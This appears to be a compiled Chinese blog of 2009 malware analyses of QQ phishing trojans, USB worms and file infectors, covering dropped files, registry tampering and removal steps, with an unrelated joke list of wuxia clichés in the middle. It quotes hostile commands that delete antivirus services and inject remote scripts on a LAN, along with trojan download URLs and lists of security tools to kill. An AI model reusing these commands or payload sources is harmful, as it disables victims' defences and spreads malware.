Snap1.jpg (16.16 K)

2009-8-31 11:14:28

由于平台的约束，几乎排除手机病毒的可能，，

我想应该是由PC端被获取的账号密码，经过一系列的处理（群登，群发），

对傀儡号码里的好友列表发送“声讯台点歌”信息，当然，这只是个骗局。

如果你不幸拨打了这些号码，那么也许有天会收到欠费单或定制业务的通知，呵呵，不要为此感到惊讶。

文件大小：57899 字节

病毒命名：

BitDefender - - Gen:Trojan.Heur.3065153434

DrWeb - - BACKDOOR.Trojan

McAfee+Artemis - - Generic!Artemis

加壳方式：ASPack

编写语言：VB

文件MD5：8a9e141947d940a08b44c58537323ec4

病毒类型：流氓程序

1、释放文件：

C:\WINDOWS\system32\gdiplus.exe 57899 字节

2、查找注册表SOFTWARE\Tencent\QQ，获得当前QQ的完整路径，保存为：

C:\WINDOWS\system32\Macromed\Flash\FlashPlayerTrust\下

3、在QQ目录下生成隐藏文件：

Program Files\Tencent\QQ\Wsock32.dll 53248 字节

Program Files\Tencent\QQ\syswsock32.dll 28,672 字节（系统文件）

实现无启动项启动

4、当运行QQ时，位于Tencent\QQ\Wsock32.dll由于目录优先性，代替系统文件被加载。

随后启动病毒C:\WINDOWS\system32\gdiplus.exe

最后再注入syswsock32.dll

5、病毒运行后在任务管理器可见，访问网络221.1.74.165

更新钓鱼面板信息：

0~1,0,0,1,0~5,0,6~0,0,0~恭喜!您的QQ号码已成功被RGB(255,0,0)后台系统随机抽选为当日在RGB(255,0,0)线“二等奖”用户,请您及时RGB(255,0,0)领取您的奖项.验证码[1686]RGB(255,0,0)^http://tenglong101.cn/tupian/qq2.bmp^http://www.qqsvm.cn/~^~~系统广播：RGB(0,0,0)庆祝腾讯QQ 10周岁感谢广大用户的支持!公司将邀请RGB(0,0,0)到赞助商三星(公司)在线举办“十周年庆典挖宝活动”RGB(0,0,0)恭喜!您已被抽选成为《二等奖》幸运用户验证码:1686RGB(0,0,255) 此次活动最终解释权归深圳腾讯公司所有RGB(0,0,0)^http://www.qqsvm.cn/~~1001~十周年庆典挖宝活动~0

6、开始弹广告....

（拜托..还没登入就开始弹...留点回忆好不好）

点击进入后发现是个钓鱼网，

大概内容是恭喜您获得XX奖（反正听起来是个很牛逼奖项...），，

然后请您汇款XX元到XX处给这个病毒作者凑棺材费.... - -!

最烦人的就是这个gdiplus.exe处于活动状态的时候会不时跳出这个面板

关都关的烦厌

其实清除起来也不难：

1、懒点的就重装下QQ，记得别放在以前安装QQ的那个盘。

重启后解决（PS：旧的QQ快捷方式要先删掉）

2、删除文件：C:\WINDOWS\system32\gdiplus.exe

重启后世界清净....

3、完整删除：

（1）暂时关闭QQ（开几个关几个），打开任务管理器，结束进程gdiplus.exe

（2）打开任意文件夹，选择“工具-文件夹选项”，勾选“显示所有文件和文件夹”，取消“隐藏受系统保护的文件”

（3）现在病毒就无处遁形了，删除文件：

C:\WINDOWS\system32\gdiplus.exe

QQ目录下的：

Program Files\Tencent\QQ\Wsock32.dll

Program Files\Tencent\QQ\syswsock32.dll

重启计算机，问题解决...

PS:如上述方法无法清除，麻烦把gdiplus.exe用Winrar压缩发送到

Lyhan_1988@163.com或526170722@qq.com

文件图标：

运行后弹出对话框，迷惑中毒用户：

添加启动项，连接radiofm24.info，在任务管理器可见：

修改主页：

解决方法：

删除启动项Windows pack Control Center：

重启计算机，问题解决，建议修改MSN密码。

文件大小：30208 bytes

病毒命名：

Kaspersky 7.0.0.125 2009.04.19 Worm.Win32.AutoRun.fpb

BitDefender 7.2 2009.04.18 Gen:Trojan.Heur.1024456363

Symantec 1.4.4.12 2009.04.19 Trojan.KillAV

加壳方式：PE_Patch.UPX

文件MD5：cbda45b0fd2a779dddbd8a4807a6be6c

行为：

1、启动时查找互斥体“AS21a669aSSE”，有则退出进程，防止多个病毒体被运行

2、释放文件：

C:\WINDOWS\Fonts\svchost.exe 11776 字节
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节

C:\WINDOWS\system32\36osafe.exe, 13531 字节
C:\WINDOWS\system32\isb.ini = 141 字节 (病毒下载列表)

C:\WINDOWS\system32\LINKINFO.dll（主体）

3、调用cmd /c sc delete avp命令，删除卡巴斯基服务

4、连接网络：http://a.wuc9.com/tt.txt保存至C:\WINDOWS\system32\isb.ini，下载其他流氓程序！

5、修改IFEO，启动重定向劫持，屏蔽常见的安全工具

360rpt.EXE
360safe.EXE
360safebox.EXE
360tray.EXE
ANTIARP.EXE
ArSwp.EXE
Ast.EXE
AutoRun.EXE
AutoRunKiller.EXE
AvMonitor.EXE
AVP.COM
AVP.EXE
CCenter.EXE
Frameworkservice.EXE
GFUpd.EXE
GuardField.EXE
HijackThis.EXE
IceSword.EXE
Iparmor.EXE
KASARP.EXE
kav32.EXE
KAVPFW.EXE
kavstart.EXE
kissvc.EXE
kmailmon.EXE
KPfwSvc.EXE
KRegEx.EXE
KVMonxp.KXP
KVSrvXP.EXE
KVWSC.EXE
kwatch.EXE
Mmsk.EXE
Navapsvc.EXE
nod32krn.EXE
Nod32kui.EXE
PFW.EXE
QQDoctor.EXE
RAV.EXE
RavMon.EXE
RavMonD.EXE
Ravservice.EXE
RavStub.EXE
RavTask.EXE
RAVTRAY.EXE
Regedit.EXE
rfwmain.EXE
rfwProxy.EXE
rfwsrv.EXE
Rfwstub.EXE
RsAgent.EXE
Rsaupd.EXE
RsMain.EXE
rsnetsvr.EXE
RSTray.EXE
Runiep.EXE
safeboxTray.EXE
ScanFrm.EXE
SREngLdr.EXE
TrojanDetector.EXE
Trojanwall.EXE
TrojDie.KXP
VPC32.EXE
VPTRAY.EXE
WOPTILITIES.EXE

5、查找窗口，发现以下文字则会被关闭：

essact
egui
RavTray
ccApp
vptray
KavStart
360Safebox
360Safetray
AfxControlBar42s
IceSword
SYSTEM
杀毒   
清理
SREng
超级巡警
金山
Anti
Mcafee
狙剑
主动防御
微点
绿鹰
主动
上报
举报
瑞星
NOD32
拦截
监控
安全卫士
监视

冰刃的关闭方式是向退出时的确认框发送“是”消息，关闭冰刃。

6、查找可用的磁盘，在目录下拷贝病毒为autorun.inf和GRIL.PIF

并每隔一段时间查找可用磁盘，完成移动盘感染

7、时隔5秒为周期，以递增方式访问192.168.0.1至192.168.0.100IP段，应该是局域传播

由于测试局限性，该行为未实现。

8、调用CMD，删除服务：

cmd.exe /c sc delete ekrn
cmd.exe /c sc delete RsRavMon
cmd.exe /c sc delete RavTask
cmd.exe /c sc delete RsScanSrv
cmd.exe /c sc delete RavCCenter

重启后诺顿和瑞星报销

9、还有这些服务也会被禁用：

Norton AntiVirus Server
McAfee Framework
Symantec AntiVirus Definition Watcher
Symantec AntiVirus Drivers Services
Norton AntiVirus
norton AntiVirus server
Kingsoft Internet Security Common Service

10、启动另一个线程：C:\WINDOWS\system32\36osafe.exe（注意是36O不是360）

在192.168.203.2-192.168.203.254的数据包内加入一个框架，参数为：

-idx 0 -ip 192.168.203.2-192.168.203.254 -port 80 -insert "<script language=javascript src=hxxp://%33%36%30%2E%63%64%64%31%2E%63%6F%6D/lg.js></script>"

解密后hxxp://360.cdd1.com/lg.js

相继连接以下站点：

hxxp://371gw.com/pai/ll.htm
hxxp://371gw.com/pai/4.htm
hxxp://371gw.com/pai/1.js
hxxp://371gw.com/pai/all.js
hxxp://371gw.com/pai/1.htm
hxxp://371gw.com/pai/ie.swf
hxxp://371gw.com/pai/all.htm
hxxp://371gw.com/pai/ll.htm

crypthtml和unescape、shellcode的混合加密
有Real，Flash，Ms0614等漏洞

下载的病毒跟这个一样！

11、删除以下注册表键值破坏安全模式：

SYSTEM\CurrentControlSet\Control\SafeBoot\Network
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

12、修改注册表：

SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall

使隐藏文件不显示，保护病毒文件

简单的解决方法：

1、下载SREng，删除启动：

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    <360safe><C:\WINDOWS\Fonts\wuauclt.exe> []

SREng能检测到的所有IFEO键值

[lfdl / lfdl][Stopped/Manual Start]
<\??\C:\WINDOWS\fonts\lfdl.sys><N/A>

[nbkkt / nbkkt][Stopped/Manual Start]
<\??\C:\WINDOWS\Fonts\nbkkt.fon><N/A>

[acpidisk / acpidisk][Running/Auto Start]
<\??\C:\WINDOWS\system32\drivers\acpidisk.sys><N/A>

pnpmem驱动

2、重启计算机，删除文件：

C:\WINDOWS\Fonts\svchost.exe 11776 字节
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节
C:\WINDOWS\system32\36osafe.exe, 13531 字节
C:\WINDOWS\system32\LINKINFO.dll

3、全部删除后解决，电脑可正常使用！

这病毒有点诡异，，可能是因为防止在虚拟机被调试

我测试的时候磕磕碰碰，现下简单分析：

一、首先运行gr.exe，没动静（任务管理器可见）...没有任何作为。

二、释放文件：

%Systemroot%\system32\sadfasdf.jpg 1198 字节

其实不是图片格式，是一个病毒列表，用文本方式打开为：

en=y
url1=http://www.dwjxn.com/new/new1.exe
url2=http://www.dwjxn.com/new/new2.exe
url3=http://www.dwjxn.com/new/new3.exe
url4=http://www.dwjxn.com/new/new4.exe
url5=http://www.dwjxn.com/new/new5.exe
url6=http://www.dwjxn.com/new/new6.exe
url7=http://www.dwjxn.com/new/new7.exe
url8=http://www.dwjxn.com/new/new8.exe
url9=http://www.dwjxn.com/new/new9.exe
url10=http://www.dwjxn.com/new/new10.exe
url11=http://www.dwjxn.com/new/new11.exe
url12=http://www.dwjxn.com/new/new12.exe
url13=http://www.dwjxn.com/new/new13.exe
url14=http://www.dwjxn.com/new/new14.exe
url15=http://www.dwjxn.com/new/new15.exe
url16=http://www1.dwjxn.com/new/new16.exe
url17=http://www1.dwjxn.com/new/new17.exe
url18=http://www1.dwjxn.com/new/new18.exe
url19=http://www1.dwjxn.com/new/new19.exe
url20=http://www1.dwjxn.com/new/new20.exe
url21=http://www1.dwjxn.com/new/new21.exe
url22=http://www1.dwjxn.com/new/new22.exe
url23=http://www1.dwjxn.com/new/new23.exe
url24=http://www1.dwjxn.com/new/new24.exe
url25=http://www1.dwjxn.com/new/new25.exe
url26=http://www1.dwjxn.com/new/new26.exe
url27=http://www1.dwjxn.com/new/new27.exe
url28=http://www1.dwjxn.com/new/new28.exe

都是病毒，，别点啊，，，

%Systemroot%\Tasks\1 7168 字节

也就是usp10.dll...

三、查找除系统盘外的可执行文件，在其目录下生成usp10.dll...属性为隐藏。

那么在运行程序的时候，会先调用目录下的usp10.dll...

四、当假usp10.dll被程序加载的时候，首先查找互斥体，有则退出。

最后加载正常的usp10.dll文件。

五、连接网络：http://www.hoho-3.cn/down/gr.exe，这里应该是最新的版本

然后添加注册表至PendingFileRenameOperations，延迟删除旧的病毒文件！

六、修改注册表，破坏显示隐藏文件：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
        Hidden
        REG_DWORD, 1 ==> REG_DWORD, 2
       ShowSuperHidden
        REG_DWORD, 1 ==> REG_DWORD, 0

七、注册一个空服务，隐藏文件：%Systemroot%\Tasks\1

当服务存在的时候，%Systemroot%\Tasks\1不能用于文件浏览

但是Acdsee、Winrar和冰刃之类的软件可以发觉该文件！

八、再联网...：http://txt.kadwo.com/oo.txt

疯狂下载木马，，一共有28个，都是盗号的木马！

因为主体没有正常运行，所以删除usp10.dll相对比较容易

1、打开注册表（Regedit），删除这个服务：LEGACY_IO

如果无法删除的话，右键，，，设置权限，，，

简单分析~~

文件名称：名称随机

文件大小：13149.dat

AV命名： Backdoor.Win32.Agent.ahj（Ikarus）

加壳方式：NsPack

文件MD5：ca2046a99c834aca83cef0efa848877f

主要行为：

1、释放文件：

%systemroot%\system32\释放3个随机文件名称的文件：

2个扩展名为dat，一个为dll，大小为243200 字节。

2、访问注册表键：SYSTEM\CurrentControlSet\Services\vmscsi

假设存在，即删除c:\ntldr（硬编码），并立刻执行命令行：shutdown -s -t 0 -f重启计算机

重启后虚拟机瘫痪。

3、添加启动项：

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
   Registry value: tyxzjal
      Type: REG_SZ
      Value: {18b39e76-903b-e580-a14c-903b16feedfb}

指向：C:\WINDOWS\system32\otsuevg.dll

4、启动rundll32.exe，进行链接库注入：rundll32.exe C:\WINDOWS\system32\130196.dat s

5、继续注入其他两个副本文件，应该是进程守护技术吧。

6、安装全局钩子，注入所有活动的进程。

7、查找计算机中是否安装快车、TM和QQ，如果有，则在其目录下生成病毒文件。

8、监控系统，如果尝试运行或加载这些文件会被删除（移动到临时文件夹）！！：

ollydbg.ini Libclsid.dat KNetWch.SYS mmskskin.dll Iereset.dll KASearch.DLL Rsaupd.exe libdll.dat CleanHis.dll WoptiClean.sys kakalib.def kkinst.ini KAVBootC.sys Ras.exe iehelp.exe trojandetector.exe KAConfig.DLL KAVPassp.DLL KKClean.dll VirUnk.def AntiActi.dll FileAnalyser.dll

（好乱啊，，，=.=）

9、还有这些关键字也会被结束删除（移动到临时文件夹）：

wopticlean 360safe \360\ Duba Kingsoft uschuk WangSea GYN Smallfrogs MicropoInt ArSwp 360Safe Spyware ackTh wb .com duba   360 修复 uba

并添加至： PendingFileRenameOperations延迟删除。

10、破坏安全模式，删除：

System\CurrentControlSet\Control\SafeBoot\Minimal    System\CurrentControlSet\Control\SafeBoot\Network

11、连接网络：s2f3.v78a344.com h**p://www.ads520.com/等

下载木马，不过没实现！

12、每激活一个进程，病毒就会注入该进程，并执行上面的操作，会重写回注册表启动！

解决方法：

其实很简单，进入System目录，查看最近修改的文件，

看到有3个文件大小一样的就删了（名字比较怪的）

然后打开注册表，查找这3个病毒名字，删除那些键

下面是解密过程：

首先是一个Url16进制转义字符加密，解密得：

hXXp://ipoqi.9999.la/

这个网站会检测Referer，如果有效，则跳转页面：

如果Referer无效，则回应一个无效地址：

假设有效，继续跳转：

h**p://221.212.156.108/cert/ip/1003473159.***

然后到这里：

一个Packed```解密得：

继续加密```:

解密后得到源代码，一个前段时间的Flash 0Day：

来自官方的安全警告:

漏洞危害: 远程执行代码
- 严重程度: 紧急
- 漏洞描述:
Adobe Macromedia Flash Player处理Flash动画(SWF)文件的方式存在多个远程执
行代码漏洞。攻击者可以通过构建特制的Flash动画(SWF)文件来利用这些漏洞，
如果用户访问包含特制的SWF文件的网站，则可能允许远程执行代码。可能作为电
子邮件附件发送特制的SWF文件。只有当打开此电子邮件附件时，用户才会面临
风险。成功利用这些漏洞的攻击者可以完全控制受影响的系统。

=============================================================

官方的Flash最近版本：

http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

下载的时候会有一个可选的谷歌插件安装

勾去掉...

另外最近流行的还有一个Real漏洞，请及时修复撒（升级至最高版本）

原来是之前傻逼“远程嗅探软件”的进化版啊！

太神奇了啊，膜拜！

看看这个简介吧！说明书里虽然硬是错了几字

但从大言不惭的字行里看起来还是牛逼牛逼滴。

哈哈，我就不废话，这种垃圾傻逼软件都是骗人的，也就是骗流量。

赚非法所得。太猥琐了~

从这个傻逼软件的组件资源里可以看到有视频资源：

另外它的“官网”是最近才建的：

里面搞笑的太多：http://www.kujingjiankong.cn/

哎，这年头，吃饱撑着的太多了~

主要行为：

1、释放文件：

C:\Windows\System32\SCVVHSOT.exe
671,744 bytes
C:\Windows\Tasks\At1.job
346 bytes

2、添加启动项：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

键名为：Yahoo Messengger，指向SCVVHSOT.exe。

3、修改注册表，跟随Explorer启动：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Shell = "Explorer.exe SCVVHSOT.exe "

4、禁用注册表和任务管理器：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
DisableTaskMgr = 0x00000001
DisableRegistryTools = 0x00000001

5、连接网络，下载乱七八糟的东西（未实现）：

http://nhatquanglan2.0catch.com/setting.nql
http://nhatquanglan2.0catch.com/setting.xls
http://www.freewebs.com/nhattruongquang/setting.nql
http://www.freewebs.com/nhattruongquang/setting.xls

6、添加一个计划任务：


C:\Windows\Tasks\At1.job

346字节的~~

解决方法：

1、下载Sreng。后断开网络连接。


http://www.kingzoo.com/tools/孤独更可靠/sreng2.5.zip

2、打开Sreng，它会提示


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

项被恶意修改，点确定后自动修复

3、删除Yahoo Messengger，指向SCVVHSOT.exe的。

4、重启计算机，删除文件：

C:\Windows\System32\SCVVHSOT.exe
C:\Windows\Tasks\At1.job

1. 悦来客栈是古代最大的连锁客栈。
2. 超级巨毒，解药，暗器都产自西域。
3. 平时朝夕相处的人，只要穿上夜行衣，再蒙个面纱，对方就不认识了。
4. 没用的小角色用的武功名字有很强的文学性和动物性，就是不大好用。
5. 长着超长白发+胡子的绝对是旷世高人，和他要拉好关系。
6. 英雄配一把好兵器，好到从不用去保养修理。
7. 在乱箭中，英雄要是不想死，就决不会死；万一中了箭，那也是因为一旁有大恶人挟持其亲人导致英雄分心。
8. 一定要象征性的打几下，才出绝招，并喷着口水大叫：“去死吧！”
9. 使出必杀技要做很花哨的动作，还要做上一两分钟，但敌人决不会乘机偷袭，尽管这是个好机会……
10. 高手都无视万有引力，到处乱飞且飞得飞快。不过要是赶远路，却会骑马。
11. 大侠套餐：2斤熟牛肉+上等女儿红。（悦来客栈长期供应……）
12. 好人从不下毒，坏人从不不下毒；但好人从不下毒却老被诬陷下毒，坏人从不不下毒却没人怀疑他。
13. 大侠想显示自己的修为，往往会捡起一根树枝将不知天高地厚的小角色打败，后来悦来客栈开始供应树枝……
14. 在一条笔直的街道被人追杀，尽管有很多事要做，但弄翻两旁的小摊是最重要的！
15. 好人用暗器是形式所逼，多才多艺，一击必中；坏人用暗器是卑鄙无耻，旁门左道，扔死了都扔不中……
16. 坏人千辛万苦扔中了，还会被好人忍着巨痛放倒，并喷着口水大叫：“卑鄙！”
17. 会有绝世佳人救起中暗器的英雄，日不久也生情……
18. 当时社会治安不好，人人佩带危险器械……
19. 菜市场杀猪的绝对是一胖子！
20. 绝世神兵被麻布一层一层裹紧，绝世神人也被麻布一层一层裹紧……
21. 主角一生坎坷或是一帆风顺，一生坎坷的会坎坷到死，一帆风顺的从不买彩票……
22. 所有人都很有钱，铜板很少出现，一张一张的银票比草纸还便宜。
23. （悦来客栈的）店小二知识渊博，有问（+钱）必答！
24. 有钱人姓金，钱；穷人叫二狗。好人坏人伪君子一听名字就知道。
25. 少林寺就1个方丈（老和尚那种8算）和1个徒弟厉害，其他都很菜。
26. 练秘籍要分性别，别如男的，女的，男女混合的，不男不女的……
27. 很喜欢在酒楼（悦来客栈）里闹事，先掀桌子，再摔椅子，最后才火拼。
28. 有时候可以一剑劈掉巨石，有时候却劈不掉一张八仙桌。
29. 英雄都很帅，大反派也很帅，龙套长相鲜明。
30. 经典台词：A：在下***，江湖人称****。
B：原来是***，久仰久仰。
A:不敢当不敢当……

31．单挑是， “ 正义 ” 一方支撑不住了，就会喊人帮忙： “ 对付这种魔头，不用和他讲什么江湖道义，大家一起上！ ”
32．打擂时，一定是翻个跟头上去的，再用30条的经典台词……
33.螳螂拳经久不衰，太极拳只有2个人会……
34.少林图书馆经常失窃……
35.尽管高手可以用鼻子闻到敌人的气息，但在被偷听时，只有对方碰翻了什么东西才能察觉。
36.被察觉的人往往在快被追上时扔闪光弹，并在这一段时间逃的比平时快10倍。
37.都喜欢假死。
38．一个人喝完闷酒一定会下暴雨。
39.一下暴雨就会打并且只打一个雷。
40.团体组合流行：四大?#，四大%￥，四大*（……
41.拔剑时，有时会有剑气，有时会拔不出来……
42.朝廷的大将军是坨屎，公公才是高手。
43．总有那么一本书、剑、玉让人抢。
44.拥有比网络更快的传播方式――嘴！
45.没见过有谁上厕所，要是有的话，那是因为被下了泻药……
46.妓院都是怡红院（我怀疑是悦来集团的子公司……）。
47.发型高度定型，甩一甩就恢复（用潘婷的？）
48.要么从小习武，要么从不习武，否则是成不了大器的。
49.大侠胜利的方式只有2种：一招搞定或100，200，300招搞定……
50.美女到处都是，这是最郁闷的……
51.英雄在受挫后，一般会遇到绝世高人或父辈的（师）兄弟、至交好友，学完功夫回来报仇……

52.英雄的父亲通常都是人人敬重的英雄或人人唾骂的败类……

53.主角最后通常都会和爱人隐居……

54.害主角家破人亡的通常是主角的叔叔……

55.主角的表兄弟或堂兄弟通常都是纨绔子弟……

56.主角都有3个以上红颜知己……

57.主角一般都是练武奇才……

58.主角练武功都比别人快……

59.主角都会交到一个邪派的好朋友，而且是生死与共的那种……

60.貌似主角都是独生子…………

中文别名：愤怒天使

文件大小：9418 bytes

AV命名：Virus.Win32.Small.l（Kaspersky） Win32/Small.S（AVG）

加壳方式：未知压缩壳

编写语言：VC

文件MD5：d84227ad798e709697aabb287c36b556

行为：

0、查找互斥体“VLPTj”，有则退出进程。

1、释放文件：

C:\WINDOWS\system32\Serverx.exe 9418 字节

2、添加启动：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

(注册表值) Serverx = "C:\windows\system32\Serverx.exe

3、禁止Admin$共享：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters

AutoShareServer = 0

4、监控“SOFTWARE\Microsoft\Windows\CurrentVersion\Run”整个项

如果有变动，则执行第二点，添加注册表。

5、下载其他木马：http://vguarder.91i.net/SETUPX.EXE

测试时未实现。

6、感染后缀名为exe和scr的文件，感染标记应该是“Angry Angel v3.0”。

感染时会跳过“wind”“winn”开头的文件夹。

感染方式没看～～

7、可能会查找局域网内可连接的主机传播该病毒。

解决方法是升级杀毒软件，修复被感染的文件。

然后删除其启动项。

Y_Y

绕主防/Hips、Byshell技术、监控文件、破组策略/IFEO、U盘感染

进程守护、关杀软、屏蔽安全工具、感染文件（带加密）、破坏安全模式等等

哈哈。

测试为反汇编和一些实机运行跟踪。

因为壳的原因，可能分析的不准确。 :)

1、检查互斥体"xcgucvnzn"，判断病毒是否已加载在内存中。

如存在，则退出，防止多个病毒体被执行。

2、创建文件：

C:\037589.log 93696 字节
C:\lsass.exe.1771547.exe 93696 字节

C:\WINDOWS\system32\Com\lsass.exe 93696 字节
C:\WINDOWS\system32\Com\smss.exe 40960 字节
C:\WINDOWS\system32\Com\netcfg.000 16384 字节
C:\WINDOWS\system32\Com\netcfg.dll 16384 字节

C:\WINDOWS\system32\1878253.log 93696 字节（随机）
C:\WINDOWS\system32\dnsq.dll 32256 字节

3、删除组策略限制的注册表项：

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer

4、删除：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\

5、破坏安全模式，删除：

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

6、防止病毒体被重定向，删除：

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

（禁止写入）

7、释放驱动C:\NetApi000.sys（\Device\NetApi000）恢复SSDT Hook。

最后删除自身。导致HIps和主动防御失效。

8、修改注册表，开启自动播放：

NoDriveTypeAutoRun DWORD: 145

9、删除服务项（如果有）：

SYSTEM\CurrentControlSet\Services\KSysCall
SYSTEM\CurrentControlSet\Services\EQService
SYSTEM\CurrentControlSet\Services\HookSys
SYSTEM\CurrentControlSet\Services\McShield
SYSTEM\CurrentControlSet\Services\tmmbd
SYSTEM\CurrentControlSet\Services\PAVSRV
SYSTEM\CurrentControlSet\Services\SymEvent
SYSTEM\CurrentControlSet\Services\ekrn
SYSTEM\CurrentControlSet\Services\KAVBase
SYSTEM\CurrentControlSet\Services\klif
SYSTEM\CurrentControlSet\Services\AntiVirService
SYSTEM\CurrentControlSet\Services\MPSVCService

10、调用cacls.exe，设置\system32\com 和病毒文件的权限为Everyone:F。

11、\system32\com下启动smss.exe和lsass.exe，使用进程守护。

当一方被结束时，另一个则将其重新启动。

12、C:\windows\system32\dnsq.dll安装全局钩子，注入所有运行中的进程。

13、发送垃圾消息到如下窗口，导致程序无法正常响应，处于假死状态：

avast
mcagent
escan
firewall
AfxControlBar42s
tapplication
antivir
ThunderRT6Timer
thunderrt6formdc
SREng
thunderrt6main
eset
mcafee
afx:
360anti
360safe
avg
facelesswndproc
bitdefender
ewido
#32770
monitor
dr.web

诊
具
SREng 介绍
升级
微点
防
云
墙
kv
木
狙剑
金山
瑞星

..........

14、尝试关闭包含kissvc、guard、watch、scan、twister字符串的进程。

15、独占方式访问：boot.ini和hosts。防止dos级删除病毒和用hosts屏蔽恶意网站。

16、查找网页格式文件，加入一段框架：

http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70

解密得：http://js.k0102.com/01.asp

该地址会检测referer，返回的来源地址如果有效，则执行：hxxp://js.k0102.com/a11.htm

感谢刺猬大大的指点。

17、ping.exe -f -n 1 www.baidu.com。如果网路通畅，调用IE访问：

hxxp://jj.gxgxy.net/html/dg2.html
hxxp://jj.gxgxy.net/html/qb2.html

每隔一段时间执行一次。垃圾广告啊。

18、在可用磁盘生成：pagefile.exe和Autorun.inf，并每隔几秒检测一次。

19、修改注册表：

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden

把REG_SZ, "checkbox"值填充垃圾数据，破坏“显示系统文件”功能。

20、每隔一段时间会检测自己破坏过的显示文件、安全模式、Ifeo、病毒文件等项。

如被修改则重新破坏。

21、忽略系统盘感染可执行文件，还加密..感染过的程序图标变16位的（模糊）。

支持Rar压缩包内可执行程序的感染 - -!

22、“高科技”：

使用了byshell的技术，当系统关机时调用SeShutdownPrivilege函数时

这时候dnsq.dll会将C盘下的某某.log拷贝到：

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\

名字格式差不多是：~.exe.某某.exe

最后计算机重启后，等病毒完全释放，立刻就删除这个：~.exe.某某.exe

哈哈，真是天衣无缝啊。

其实这种垃圾技术，只要冷启动就可以对付了。

23、尝试删除dnsq.dll的时候，它会立刻重启计算机。由第22点，关机前写入病毒。

造成一个死循环。

24、监控lsass.exe、smss.exe、dnsq.dll文件，假设不存在，由dnsq.dll重新拷贝回去。

因为dnsq.dll安装的是全局钩子（在所有进程中），所以非常麻烦。理论上不可能删除成功

25、当拷贝失败后，病毒会调用rd /s /q命令删除原来的文件，再重新写入。

那么所谓的免疫文件夹就失效了，其中包括歧义文件夹。

26、连接http://**.k0***.com/go.asp计算感染人数并跳转http://**.k0***.com/goto.htm下载木马。

过几天无聊了再去测试.. - -

另外附上安铁偌的磁碟机专杀：

www.kingzoo.com/tools/孤独更可靠/Auk_diskGenKiller.exe

个人防护建议：

1、打齐系统补丁。

2、安装杀毒软件和防火墙，并开启自动升级。

3、不浏览yellow网站，下载软件时尽量到大网站或官方。